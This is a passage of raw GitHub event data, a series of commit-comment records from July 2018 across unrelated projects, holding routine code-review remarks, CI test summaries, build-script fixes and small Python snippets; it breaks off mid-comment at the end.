{"id":"7965852595","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"drewyh/EnergyPlus"},"payload":{"comment":{"id":29709478,"position":null,"line":null,"path":null,"commit_id":"b46db8d3ea2a72281a516814ec9bd4f7397ce700","created_at":"2018-07-14T14:21:59Z","updated_at":"2018-07-14T14:21:59Z","author_association":"NONE","body":"oo_boiler_refactor (drewyh) - i386-Windows-7-VisualStudio-14: Tests Failed (2374 of 2935 tests passed, 62 test warnings)\n\nMessages:\n\n * 623 tests had: EIO diffs.\n * 557 tests had: Table big diffs.\n * 76 tests had: ESO big diffs.\n * 102 tests had: AUD diffs.\n * 156 tests had: BND diffs.\n * 168 tests had: ESO small diffs.\n * 151 tests had: MDD diffs.\n * 156 tests had: MTD diffs.\n * 105 tests had: MTR small diffs.\n * 151 tests had: RDD diffs.\n * 35 tests had: MTR big diffs.\n * 22 tests had: ERR diffs.\n * 1 test had: Table small diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 62\n * Failed: 561\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b46db8d3ea2a72281a516814ec9bd4f7397ce700-PR6728-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b46db8d3ea2a72281a516814ec9bd4f7397ce700-PR6728-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-80.89%25-red.png)</a> \n"}},"created_at":"2018-07-14T14:21:59Z"}
{"id":"7965853039","type":"CommitCommentEvent","actor":{"login":"guruofquality"},"repo":{"name":"jocover/SoapyPlutoSDR"},"payload":{"comment":{"id":29709479,"position":27,"line":27,"path":"CMakeLists.txt","commit_id":"22eeaa215eaf167362089d9e4bc54f396deb5853","created_at":"2018-07-14T14:22:16Z","updated_at":"2018-07-14T14:22:16Z","author_association":"NONE","body":"@jocover typo? PlutSDRSupport -> PlutoSDRSupport"}},"created_at":"2018-07-14T14:22:16Z"}
{"id":"7965854472","type":"CommitCommentEvent","actor":{"login":"bmuschko"},"repo":{"name":"bmuschko/link-verifier"},"payload":{"comment":{"id":29709480,"position":25,"line":20,"path":"file/file.go","commit_id":"ed13880b9dcaf748fa479fc926c46f21b7a8e93d","created_at":"2018-07-14T14:23:19Z","updated_at":"2018-07-14T14:23:19Z","author_association":"OWNER","body":"Can you elaborate?"}},"created_at":"2018-07-14T14:23:19Z"}
{"id":"7965855087","type":"CommitCommentEvent","actor":{"login":"kommuri"},"repo":{"name":"kommuri/kommuri"},"payload":{"comment":{"id":29709483,"position":null,"line":null,"path":null,"commit_id":"87bd4ae241cc33fa80cf2cf27d7d467e216a1cd4","created_at":"2018-07-14T14:23:54Z","updated_at":"2018-07-14T14:23:54Z","author_association":"OWNER","body":"hai"}},"created_at":"2018-07-14T14:23:54Z"}
{"id":"7965862170","type":"CommitCommentEvent","actor":{"login":"rofl0r"},"repo":{"name":"sabotage-linux/gettext-tiny"},"payload":{"comment":{"id":29709504,"position":null,"line":null,"path":null,"commit_id":"7698cca6d5634ce0de4bb382e0535e1f02d7fb17","created_at":"2018-07-14T14:29:14Z","updated_at":"2018-07-14T14:29:14Z","author_association":"MEMBER","body":"great job! seems to work fine (after i fixed the permissions of install.sh in e487f803e1c71e48c950bc373ce3d53b4c6921ef)"}},"created_at":"2018-07-14T14:29:14Z"}
{"id":"7965862250","type":"CommitCommentEvent","actor":{"login":"shingoushori"},"repo":{"name":"shingoushori/simutrans"},"payload":{"comment":{"id":29709505,"position":null,"line":null,"path":null,"commit_id":"02401eacbfe673cec03e841161f14105ff4c7493","created_at":"2018-07-14T14:29:18Z","updated_at":"2018-07-14T14:29:18Z","author_association":"OWNER","body":"↓here is the efficient modification of this commit \r\nhttps://github.com/shingoushori/simutrans/commit/2dcab74f8a57069b776fbb3c23993599be8d18bb"}},"created_at":"2018-07-14T14:29:18Z"}
{"id":"7965862931","type":"CommitCommentEvent","actor":{"login":"lastdushen"},"repo":{"name":"lastdushen/hello"},"payload":{"comment":{"id":29709506,"position":1,"line":1,"path":"README.md","commit_id":"a05a7cfa15d2bdd60118b65522bb8379d10ec615","created_at":"2018-07-14T14:29:51Z","updated_at":"2018-07-14T14:29:51Z","author_association":"OWNER","body":"heihei"}},"created_at":"2018-07-14T14:29:51Z"}
{"id":"7965863224","type":"CommitCommentEvent","actor":{"login":"Jackchows"},"repo":{"name":"Jackchows/Cangjie5"},"payload":{"comment":{"id":29709508,"position":115,"line":16259,"path":"Cangjie5.txt","commit_id":"8bee383b071ead9996e23fea9556049ebbc50b1a","created_at":"2018-07-14T14:30:06Z","updated_at":"2018-07-14T14:30:06Z","author_association":"OWNER","body":"「𣹭」有从「![u 20ad3_g](https://user-images.githubusercontent.com/10194519/42725356-d4277ffe-87b4-11e8-808c-78e43039ac37.png)」的字形，所以不收从「![u 20ad3_t](https://user-images.githubusercontent.com/10194519/42725365-eb016afa-87b4-11e8-8644-4e0d92e411b0.png)」的字形，「水卜女水」可以標[uv]。\r\n「𣹳 eyve」已經標[u]，[v]因為當時沒有查所以沒有標，可以加上去。"}},"created_at":"2018-07-14T14:30:06Z"}
{"id":"7965863230","type":"CommitCommentEvent","actor":{"login":"rofl0r"},"repo":{"name":"sabotage-linux/gettext-tiny"},"payload":{"comment":{"id":29709509,"position":null,"line":null,"path":null,"commit_id":"1a4dc39864ff80c5fb2464b16c4609593c34ae69","created_at":"2018-07-14T14:30:06Z","updated_at":"2018-07-14T14:30:06Z","author_association":"MEMBER","body":"this is totally bogus, imo. see #31 and #32"}},"created_at":"2018-07-14T14:30:06Z"}
{"id":"7965864321","type":"CommitCommentEvent","actor":{"login":"lastdushen"},"repo":{"name":"lastdushen/hello"},"payload":{"comment":{"id":29709512,"position":null,"line":null,"path":null,"commit_id":"a05a7cfa15d2bdd60118b65522bb8379d10ec615","created_at":"2018-07-14T14:30:47Z","updated_at":"2018-07-14T14:30:47Z","author_association":"OWNER","body":"lastdushen"}},"created_at":"2018-07-14T14:30:47Z"}
{"id":"7965864819","type":"CommitCommentEvent","actor":{"login":"soniurvashi11"},"repo":{"name":"soniurvashi11/react-redux"},"payload":{"comment":{"id":29709513,"position":null,"line":null,"path":null,"commit_id":"889fc33089a54afa45c9c0228eb3a8bcd41f5994","created_at":"2018-07-14T14:31:08Z","updated_at":"2018-07-14T14:31:08Z","author_association":"OWNER","body":"web hook test"}},"created_at":"2018-07-14T14:31:08Z"}
{"id":"7965864991","type":"CommitCommentEvent","actor":{"login":"marcosvitali"},"repo":{"name":"RPCS3/rpcs3"},"payload":{"comment":{"id":29709514,"position":null,"line":null,"path":null,"commit_id":"e7f30640ef5ab8ce7b3647a3dea247d5e480cd83","created_at":"2018-07-14T14:31:15Z","updated_at":"2018-07-14T14:31:15Z","author_association":"NONE","body":"LOL, when I programmed this with my friend rodolfo in Ishiruka a lot of time ago, all devs says that sucks and now the same  feature y Dolphin master and now here haahhahahha"}},"created_at":"2018-07-14T14:31:15Z"}
{"id":"7965865583","type":"CommitCommentEvent","actor":{"login":"WinterMute"},"repo":{"name":"thomasnet-mc/EdiZon"},"payload":{"comment":{"id":29709518,"position":null,"line":null,"path":null,"commit_id":"35df7745930442ad5c0a71261f4d4664d1199019","created_at":"2018-07-14T14:31:44Z","updated_at":"2018-07-14T14:31:44Z","author_association":"NONE","body":"Oh, ok, cool. \r\n\r\nThanks for fixing the Makefile too."}},"created_at":"2018-07-14T14:31:44Z"}
{"id":"7965867260","type":"CommitCommentEvent","actor":{"login":"reactnodepostgresql"},"repo":{"name":"reactnodepostgresql/background-generator"},"payload":{"comment":{"id":29709519,"position":null,"line":null,"path":null,"commit_id":"38e3a080ca04d0d09493691c50a279c95eccef9e","created_at":"2018-07-14T14:33:03Z","updated_at":"2018-07-14T14:33:03Z","author_association":"OWNER","body":"bfbsbd"}},"created_at":"2018-07-14T14:33:03Z"}
{"id":"7965868308","type":"CommitCommentEvent","actor":{"login":"lastdushen"},"repo":{"name":"lastdushen/hello"},"payload":{"comment":{"id":29709520,"position":null,"line":null,"path":null,"commit_id":"a05a7cfa15d2bdd60118b65522bb8379d10ec615","created_at":"2018-07-14T14:33:47Z","updated_at":"2018-07-14T14:33:47Z","author_association":"OWNER","body":"hi"}},"created_at":"2018-07-14T14:33:47Z"}
{"id":"7965868743","type":"CommitCommentEvent","actor":{"login":"n-t-roff"},"repo":{"name":"n-t-roff/heirloom-doctools"},"payload":{"comment":{"id":29709521,"position":null,"line":null,"path":null,"commit_id":"fd2816bbce0e5f8830e5c977cdaf8d322d84db10","created_at":"2018-07-14T14:34:08Z","updated_at":"2018-07-14T14:34:08Z","author_association":"OWNER","body":"There are also changes in processing of old documents, which I had not expected. There is a regression test started with `make test`. I have updated the reference files in commit 1fff3c5 (GitHub treats PS files as binary and doesn't do a diff, unfortunately), which shows the differences."}},"created_at":"2018-07-14T14:34:08Z"}
{"id":"7965871301","type":"CommitCommentEvent","actor":{"login":"takakuda"},"repo":{"name":"Ryutooooo/sample_app"},"payload":{"comment":{"id":29709525,"position":9,"line":9,"path":"app/helpers/application_helper.rb","commit_id":"5a92cc9dbd72a88a865af5b12506fc0f06d43b9b","created_at":"2018-07-14T14:36:07Z","updated_at":"2018-07-14T14:36:07Z","author_association":"NONE","body":"```\r\nbase_title if page_title.empty?\r\npage_title + \"|\" + base_title\r\n```\r\n↑こんな風に書けます\r\n`empty?`より`blank?`使ったほうが良いかな？\r\n参考:https://qiita.com/somewhatgood@github/items/b74107480ee3821784e6"}},"created_at":"2018-07-14T14:36:07Z"}
{"id":"7965873533","type":"CommitCommentEvent","actor":{"login":"ibell"},"repo":{"name":"CoolProp/CoolProp"},"payload":{"comment":{"id":29709530,"position":null,"line":null,"path":null,"commit_id":"0fdc8b2125bc011e99117b456eef672656be7ef9","created_at":"2018-07-14T14:37:48Z","updated_at":"2018-07-14T14:37:48Z","author_association":"CONTRIBUTOR","body":"Hrm, yes I can see that being a problem.  Maybe it would be wise to bugfix\nthe 6.1.0 tag with that update.  This is one of the challenges with the use\nof submodules.  Think you can manage that?\n\nOn Thu, Jul 12, 2018 at 4:09 AM, chermsdorf <notifications@github.com>\nwrote:\n\n> Hi Ian,\n>\n> I had problems with the master branch of CoolProp which is why I checked\n> out the CoolProp v6.1.0 tag according to Thomas Pedot's suggestions (see\n> modelica/ExternalMedia#14\n> <https://github.com/modelica/ExternalMedia/issues/14>). But in doing so I\n> do not receive the updated .gitmodules. So my question is if the path could\n> be corrected in the v6.1.0 tag as well.\n>\n> Best regards\n> Christian\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/CoolProp/CoolProp/commit/0fdc8b2125bc011e99117b456eef672656be7ef9#commitcomment-29683004>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ABxha0zQHqXHji3OmIK3JG1496A6AS5yks5uFyBcgaJpZM4L3L3b>\n> .\n>\n"}},"created_at":"2018-07-14T14:37:48Z"}
{"id":"7965874218","type":"CommitCommentEvent","actor":{"login":"wilsonge"},"repo":{"name":"joomla/joomla-cms"},"payload":{"comment":{"id":29709532,"position":4,"line":2,"path":".eslintignore","commit_id":"32fe2a6bad3f607c18e4c77bc35c2b6f2ec63c25","created_at":"2018-07-14T14:38:19Z","updated_at":"2018-07-14T14:38:19Z","author_association":"CONTRIBUTOR","body":"If you are ignoring *.js you need to whitelist the files we want audited... otherwise everything else here is useless otherwise"}},"created_at":"2018-07-14T14:38:19Z"}
{"id":"7965874915","type":"CommitCommentEvent","actor":{"login":"downtiser"},"repo":{"name":"downtiser/python-one"},"payload":{"comment":{"id":29709533,"position":null,"line":null,"path":null,"commit_id":"294b145ffcc458893157efd8d1035761a2e2a47c","created_at":"2018-07-14T14:38:53Z","updated_at":"2018-07-14T14:38:53Z","author_association":"OWNER","body":"### Modify a file:copy the old file and change, then copy to the new file\r\n```\r\nold=open(\"tank\",'r',encoding='utf-8')\r\nnew=open('new_tank','w',encoding='utf-8')\r\n\r\nfor line in old:\r\n    if 'downtiser' in line:\r\n        line=line.replace('downtiser','git downtiseme')\r\n    new.write(line)\r\nold.close()\r\nnew.close()\r\n```"}},"created_at":"2018-07-14T14:38:53Z"}
{"id":"7965875348","type":"CommitCommentEvent","actor":{"login":"jcktm"},"repo":{"name":"jcktm/loki"},"payload":{"comment":{"id":29709534,"position":24,"line":112,"path":"src/cryptonote_basic/cryptonote_basic_impl.cpp","commit_id":"40cee03cfb3cdc0a31cc712f8be7c77e2f6b0087","created_at":"2018-07-14T14:39:10Z","updated_at":"2018-07-14T14:39:10Z","author_association":"OWNER","body":"Oh shit, nice catch. Pretty sure the integer division rounds down before casting to double, that's a bug."}},"created_at":"2018-07-14T14:39:10Z"}
{"id":"7965878453","type":"CommitCommentEvent","actor":{"login":"anastr"},"repo":{"name":"anastr/SpeedView"},"payload":{"comment":{"id":29709537,"position":null,"line":null,"path":null,"commit_id":"df687ad9497ac7eac488ffed288429ee928d659a","created_at":"2018-07-14T14:41:31Z","updated_at":"2018-07-14T14:41:31Z","author_association":"OWNER","body":"fix #100 issue."}},"created_at":"2018-07-14T14:41:31Z"}
{"id":"7965879186","type":"CommitCommentEvent","actor":{"login":"arturi"},"repo":{"name":"transloadit/uppy"},"payload":{"comment":{"id":29709538,"position":null,"line":null,"path":null,"commit_id":"f66fe422992a8fb3e8f9a61cd0773b0d16ac6fdd","created_at":"2018-07-14T14:42:07Z","updated_at":"2018-07-14T14:42:07Z","author_association":"COLLABORATOR","body":"Thank you!"}},"created_at":"2018-07-14T14:42:07Z"}
{"id":"7965881411","type":"CommitCommentEvent","actor":{"login":"ivasic"},"repo":{"name":"ivasic/abna"},"payload":{"comment":{"id":29709544,"position":null,"line":null,"path":null,"commit_id":"f593203178a99c392fb9486fcf24472df57bc6aa","created_at":"2018-07-14T14:43:50Z","updated_at":"2018-07-14T14:43:50Z","author_association":"OWNER","body":"Fair enough. Sending a PR then.."}},"created_at":"2018-07-14T14:43:50Z"}
{"id":"7965882248","type":"CommitCommentEvent","actor":{"login":"dgrammatiko"},"repo":{"name":"joomla/joomla-cms"},"payload":{"comment":{"id":29709545,"position":4,"line":2,"path":".eslintignore","commit_id":"32fe2a6bad3f607c18e4c77bc35c2b6f2ec63c25","created_at":"2018-07-14T14:44:32Z","updated_at":"2018-07-14T14:44:32Z","author_association":"MEMBER","body":"it's pretty clear that having both the es6 and the es5 files in the same dir will never work unless we make a huge list of excluded files which will shortly become unmaintainable. Personal opinion is that it was wrong to enable the linter (which expects only ES6 code when the majority of our scripts are still ES5). I mean if someone wants to figure out how this could work out for houndCI that would be great but for the time being hound is marking way too many unrelated files with errors..."}},"created_at":"2018-07-14T14:44:32Z"}
{"id":"7965882716","type":"CommitCommentEvent","actor":{"login":"LarryHudson322"},"repo":{"name":"LarryHudson322/ChrisR"},"payload":{"comment":{"id":29709546,"position":null,"line":null,"path":null,"commit_id":"8777c7e73cd8034bdafe9f319812bd5cf2c0d950","created_at":"2018-07-14T14:44:54Z","updated_at":"2018-07-14T14:44:54Z","author_association":"OWNER","body":"corrected"}},"created_at":"2018-07-14T14:44:54Z"}
{"id":"7965883409","type":"CommitCommentEvent","actor":{"login":"AntonioMeireles"},"repo":{"name":"clearlinux-pkgs/containerd"},"payload":{"comment":{"id":29709550,"position":19,"line":19,"path":"0001-Enable-passing-version-to-make.patch","commit_id":"00aafb4a65e095b666b6cbb73d57397a15ec8175","created_at":"2018-07-14T14:45:24Z","updated_at":"2018-07-14T14:45:24Z","author_association":"NONE","body":"current patch doesn't do much good... output as of ClearLinux 23710 is \r\n```\r\ncontainerd --version\r\ncontainerd github.com/containerd/containerd 773c489c9c1b21a6d78b5c538cd395416ec50f88 .m\r\n```\r\nat sight you need to mod \r\n`VERSION ?=$(shell git describe --match 'v[0-9]*' --dirty='.m' --always)` => `VERSION ?=%{version}`"}},"created_at":"2018-07-14T14:45:24Z"}
{"id":"7965883615","type":"CommitCommentEvent","actor":{"login":"Ma-cherie"},"repo":{"name":"Ma-cherie/learngit"},"payload":{"comment":{"id":29709551,"position":1,"line":1,"path":"readme.txt","commit_id":"3c26f58aecfea927367b25e4d118eed0b040dbf9","created_at":"2018-07-14T14:45:32Z","updated_at":"2018-07-14T14:45:32Z","author_association":"OWNER","body":"fisher's joke! lol"}},"created_at":"2018-07-14T14:45:32Z"}
{"id":"7965883733","type":"CommitCommentEvent","actor":{"login":"AntonioMeireles"},"repo":{"name":"clearlinux-pkgs/containerd"},"payload":{"comment":{"id":29709552,"position":20,"line":20,"path":"0001-Enable-passing-version-to-make.patch","commit_id":"00aafb4a65e095b666b6cbb73d57397a15ec8175","created_at":"2018-07-14T14:45:37Z","updated_at":"2018-07-14T14:45:37Z","author_association":"NONE","body":"and `REVISION=$(shell git rev-parse HEAD)$(shell if ! git diff --no-ext-diff --quiet --exit-code; then echo .m; fi)` => `REVISION?=773c489c9c1b21a6d78b5c538cd395416ec50f88`"}},"created_at":"2018-07-14T14:45:37Z"}
{"id":"7965884723","type":"CommitCommentEvent","actor":{"login":"edrickhong"},"repo":{"name":"edrickhong/Cu"},"payload":{"comment":{"id":29709554,"position":null,"line":null,"path":null,"commit_id":"5dc23c2974bd88d65d8ebc27a48fbdfa7fbe5247","created_at":"2018-07-14T14:46:22Z","updated_at":"2018-07-14T14:46:22Z","author_association":"OWNER","body":"travis ci's environment uses an older version of wayland-scanner"}},"created_at":"2018-07-14T14:46:22Z"}
{"id":"7965885876","type":"CommitCommentEvent","actor":{"login":"AntonioMeireles"},"repo":{"name":"clearlinux-pkgs/containerd"},"payload":{"comment":{"id":29709555,"position":32,"line":36,"path":"containerd.spec","commit_id":"00aafb4a65e095b666b6cbb73d57397a15ec8175","created_at":"2018-07-14T14:47:18Z","updated_at":"2018-07-14T14:47:18Z","author_association":"NONE","body":"finally ...\r\n`make V=1 %{?_smp_mflags} VERSION=773c489c9c1b21a6d78b5c538cd395416ec50f88` => `make V=1 %{?_smp_mflags} VERSION=%{version} REVISION=773c489c9c1b21a6d78b5c538cd395416ec50f88`\r\n\r\nshould then give us (from `containerd --version`) something along `containerd github.com/containerd/containerd v1.0.3 773c489c9c1b21a6d78b5c538cd395416ec50f88` which is what docker expects ;-) \r\n\r\n(&& THANKS!)"}},"created_at":"2018-07-14T14:47:18Z"}
{"id":"7965886384","type":"CommitCommentEvent","actor":{"login":"Sedictious"},"repo":{"name":"cltk/cltk"},"payload":{"comment":{"id":29709556,"position":55,"line":66,"path":"cltk/phonology/syllabify.py","commit_id":"a2326070b5f06165502dd52e2e3f61d087a92654","created_at":"2018-07-14T14:47:40Z","updated_at":"2018-07-14T14:47:40Z","author_association":"CONTRIBUTOR","body":"this is what I thought, but apparently it returns a ValueError. There may be a pythonism we are ignoring though..."}},"created_at":"2018-07-14T14:47:40Z"}
{"id":"7965887300","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29709558,"position":null,"line":null,"path":null,"commit_id":"26f1e83eeeb323772e9f31bcda961d2f2af216e3","created_at":"2018-07-14T14:48:22Z","updated_at":"2018-07-14T14:48:22Z","author_association":"NONE","body":"FanEnergyIndex (XuanLuoLBL) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2316 of 2316 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-26f1e83eeeb323772e9f31bcda961d2f2af216e3-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-26f1e83eeeb323772e9f31bcda961d2f2af216e3-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-26f1e83eeeb323772e9f31bcda961d2f2af216e3-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.2%25-green.png)</a>\n"}},"created_at":"2018-07-14T14:48:22Z"}
{"id":"7965888318","type":"CommitCommentEvent","actor":{"login":"fpmoles"},"repo":{"name":"fpmoles/talks-devsecops"},"payload":{"comment":{"id":29709560,"position":null,"line":null,"path":null,"commit_id":"53ef5687868f0897f42c79a5152ee617422ac012","created_at":"2018-07-14T14:49:11Z","updated_at":"2018-07-14T14:49:11Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [DevSecOps: Building a Culture of Security](https://trello.com/c/nio9iG4O/5-devsecops-building-a-culture-of-security)"}},"created_at":"2018-07-14T14:49:11Z"}
{"id":"7965888391","type":"CommitCommentEvent","actor":{"login":"danny0838"},"repo":{"name":"Jackchows/Cangjie5"},"payload":{"comment":{"id":29709561,"position":115,"line":16259,"path":"Cangjie5.txt","commit_id":"8bee383b071ead9996e23fea9556049ebbc50b1a","created_at":"2018-07-14T14:49:14Z","updated_at":"2018-07-14T14:49:14Z","author_association":"NONE","body":"有收「卜戈」，但也有收「大戈」（T源），那當然應該要支援「大戈」，不然看到那個字形的使用者怎麼辦？\r\n\r\n![default](https://user-images.githubusercontent.com/531417/42725549-e0340a1c-87b7-11e8-9ae0-7cb79bb6c7ec.png)\r\n"}},"created_at":"2018-07-14T14:49:14Z"}
{"id":"7965889086","type":"CommitCommentEvent","actor":{"login":"caricnj18"},"repo":{"name":"caricnj18/project03"},"payload":{"comment":{"id":29709562,"position":null,"line":null,"path":null,"commit_id":"6b0414114b8dba77f064cf6151f065a507473925","created_at":"2018-07-14T14:49:47Z","updated_at":"2018-07-14T14:49:47Z","author_association":"OWNER","body":"all good"}},"created_at":"2018-07-14T14:49:47Z"}
{"id":"7965889105","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29709563,"position":null,"line":null,"path":null,"commit_id":"26f1e83eeeb323772e9f31bcda961d2f2af216e3","created_at":"2018-07-14T14:49:48Z","updated_at":"2018-07-14T14:49:48Z","author_association":"NONE","body":"FanEnergyIndex (XuanLuoLBL) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-26f1e83eeeb323772e9f31bcda961d2f2af216e3-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.png)</a>  \n"}},"created_at":"2018-07-14T14:49:48Z"}
{"id":"7965889816","type":"CommitCommentEvent","actor":{"login":"mihranz7"},"repo":{"name":"lite-os-devices/device_xiaomi_whyred"},"payload":{"comment":{"id":29709565,"position":null,"line":null,"path":null,"commit_id":"add68c1e3812f04534e4a402fa08d26fea90f07f","created_at":"2018-07-14T14:50:19Z","updated_at":"2018-07-14T14:50:19Z","author_association":"NONE","body":"Such Kang, much wow! Keep going!"}},"created_at":"2018-07-14T14:50:19Z"}
{"id":"7965890487","type":"CommitCommentEvent","actor":{"login":"Basa0"},"repo":{"name":"Basa0/LightTaskManager"},"payload":{"comment":{"id":29709569,"position":5,"line":11,"path":"LightTaskManagerWPF/LightTaskManagerWPF.csproj","commit_id":"dea8e28536189be70d768462f5fbf4cb456a1561","created_at":"2018-07-14T14:50:49Z","updated_at":"2018-07-14T14:50:49Z","author_association":"OWNER","body":"LightProcessWindows.csproj was created for 4.7.1."}},"created_at":"2018-07-14T14:50:49Z"}
{"id":"7965891133","type":"CommitCommentEvent","actor":{"login":"AniLeo"},"repo":{"name":"RPCS3/rpcs3"},"payload":{"comment":{"id":29709570,"position":null,"line":null,"path":null,"commit_id":"e7f30640ef5ab8ce7b3647a3dea247d5e480cd83","created_at":"2018-07-14T14:51:21Z","updated_at":"2018-07-14T14:51:21Z","author_association":"CONTRIBUTOR","body":"Eeh what is this related to rpcs3? I don't remember kd-11 participating in such discussion, he had planned async shaders for a while."}},"created_at":"2018-07-14T14:51:21Z"}
{"id":"7965891720","type":"CommitCommentEvent","actor":{"login":"ModulesUnraveled"},"repo":{"name":"ModulesUnraveled/digitalartteacher"},"payload":{"comment":{"id":29709571,"position":null,"line":null,"path":null,"commit_id":"e1907f412424466bf30e1d872e1ab14352c9e1d6","created_at":"2018-07-14T14:51:51Z","updated_at":"2018-07-14T14:51:51Z","author_association":"OWNER","body":"Created multidev environment [digitalartteacher#pr-9](https://dashboard.pantheon.io/sites/a1a39465-2598-4d1c-9c37-d19647b48566#pr-9).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-9-digitalartteacher.pantheonsite.io/)"}},"created_at":"2018-07-14T14:51:51Z"}
{"id":"7965893632","type":"CommitCommentEvent","actor":{"login":"atvcaptain"},"repo":{"name":"oe-alliance/oe-alliance-core"},"payload":{"comment":{"id":29709574,"position":null,"line":null,"path":null,"commit_id":"4adec0604153cb4718e1702f30401d2a3ae706f1","created_at":"2018-07-14T14:53:28Z","updated_at":"2018-07-14T14:53:28Z","author_association":"MEMBER","body":"yes, i commit a wrong file , i have forget i have change it :)"}},"created_at":"2018-07-14T14:53:28Z"}
{"id":"7965895205","type":"CommitCommentEvent","actor":{"login":"downtiser"},"repo":{"name":"downtiser/python-one"},"payload":{"comment":{"id":29709575,"position":null,"line":null,"path":null,"commit_id":"294b145ffcc458893157efd8d1035761a2e2a47c","created_at":"2018-07-14T14:54:39Z","updated_at":"2018-07-14T14:54:39Z","author_association":"OWNER","body":"### Modify a file through the way like shell sed:\r\n```\r\n#Downtiser\r\n\r\nimport sys\r\nold=open(\"tank\",'r',encoding='utf-8')\r\nnew=open('new_tank','w',encoding='utf-8')\r\n\r\n\r\nfind=sys.argv[1]\r\nrenew=sys.argv[2]\r\n\r\nfor line in old:\r\n    if find in line:\r\n        line=line.replace(find,renew)\r\n    new.write(line)\r\nold.close()\r\nnew.close()\r\n```"}},"created_at":"2018-07-14T14:54:39Z"}
{"id":"7965896735","type":"CommitCommentEvent","actor":{"login":"hasa0108"},"repo":{"name":"hasa0108/github_test"},"payload":{"comment":{"id":29709576,"position":5,"line":8,"path":"index.html","commit_id":"513405129655152ced7e4d7800b87f1abfae5d74","created_at":"2018-07-14T14:55:51Z","updated_at":"2018-07-14T14:55:51Z","author_association":"OWNER","body":"`<p>test<em>test</em></p>`を追加しました。"}},"created_at":"2018-07-14T14:55:51Z"}
{"id":"7965897499","type":"CommitCommentEvent","actor":{"login":"binux"},"repo":{"name":"binux/pyspider"},"payload":{"comment":{"id":29709577,"position":null,"line":null,"path":null,"commit_id":"5e1e930b581afea7ff9060d64b1a279cce36a3e9","created_at":"2018-07-14T14:56:27Z","updated_at":"2018-07-14T14:56:27Z","author_association":"OWNER","body":"判断加载结束方法有两种：\r\n1. 没有网络加载超过一定时间\r\n2. 让一用户指定一个wait_js，返回true时结束"}},"created_at":"2018-07-14T14:56:27Z"}
{"id":"7965898329","type":"CommitCommentEvent","actor":{"login":"nestjs57"},"repo":{"name":"nestjs57/LiveAt500px"},"payload":{"comment":{"id":29709578,"position":null,"line":null,"path":null,"commit_id":"762a1d8eb340407b09f7b495f00a74a72172c44e","created_at":"2018-07-14T14:56:57Z","updated_at":"2018-07-14T14:56:57Z","author_association":"OWNER","body":"![startanimbutton](https://user-images.githubusercontent.com/29501571/42725609-cfcb15aa-87b0-11e8-82e9-ba2261603919.PNG)\r\n"}},"created_at":"2018-07-14T14:56:57Z"}
{"id":"7965900460","type":"CommitCommentEvent","actor":{"login":"nestjs57"},"repo":{"name":"nestjs57/LiveAt500px"},"payload":{"comment":{"id":29709586,"position":null,"line":null,"path":null,"commit_id":"762a1d8eb340407b09f7b495f00a74a72172c44e","created_at":"2018-07-14T14:58:39Z","updated_at":"2018-07-14T14:58:39Z","author_association":"OWNER","body":"FadeInButton\r\n![animfadeinbutton](https://user-images.githubusercontent.com/29501571/42725620-042e0ce4-87b1-11e8-8aed-2e42dfa672b3.PNG)\r\n"}},"created_at":"2018-07-14T14:58:39Z"}
{"id":"7965900944","type":"CommitCommentEvent","actor":{"login":"nestjs57"},"repo":{"name":"nestjs57/LiveAt500px"},"payload":{"comment":{"id":29709587,"position":null,"line":null,"path":null,"commit_id":"762a1d8eb340407b09f7b495f00a74a72172c44e","created_at":"2018-07-14T14:59:02Z","updated_at":"2018-07-14T14:59:02Z","author_association":"OWNER","body":"FadeOutButton\r\n![animfadeoutbutton](https://user-images.githubusercontent.com/29501571/42725624-18ca3df8-87b1-11e8-9bfb-e9e3806d3e4c.PNG)\r\n"}},"created_at":"2018-07-14T14:59:02Z"}
{"id":"7965902256","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":29709591,"position":null,"line":null,"path":null,"commit_id":"28e20d6e5f920e48688c71456f9392a4a5f78135","created_at":"2018-07-14T15:00:05Z","updated_at":"2018-07-14T15:00:05Z","author_association":"COLLABORATOR","body":"> It makes little sense to define a function inside another function (ASL(SHA512_Round) ).\r\n\r\nYeah, I'm not sure of the reason either. The code was written by Wei about 10 or 15 years ago. With no record of the reason I prefer to leave it alone.\r\n\r\nIf I were to hazard a guess, I would say it is crafted that to create some stack space in a leaf function without the full prologue/epilogue. I've seen other tricks like that when performance is a concern, like using `pusha` twice to create some local stack space. The first `pusha` saves the registers of interest, the second creates a small working 